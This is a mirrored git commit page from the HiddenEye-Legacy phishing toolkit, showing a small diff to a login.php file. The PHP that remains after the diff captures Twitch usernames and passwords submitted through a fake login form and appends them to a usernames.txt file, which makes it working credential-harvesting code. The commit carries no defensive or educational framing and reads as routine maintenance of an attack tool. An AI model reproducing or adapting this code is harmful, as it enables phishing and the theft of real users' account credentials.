mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update login.php
This commit is contained in:
parent
e513d30ec6
commit
8b42f65c3d
|
@ -1,5 +1,4 @@
|
|||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);
|
||||
|
|
Loading…
Reference in New Issue
Block a user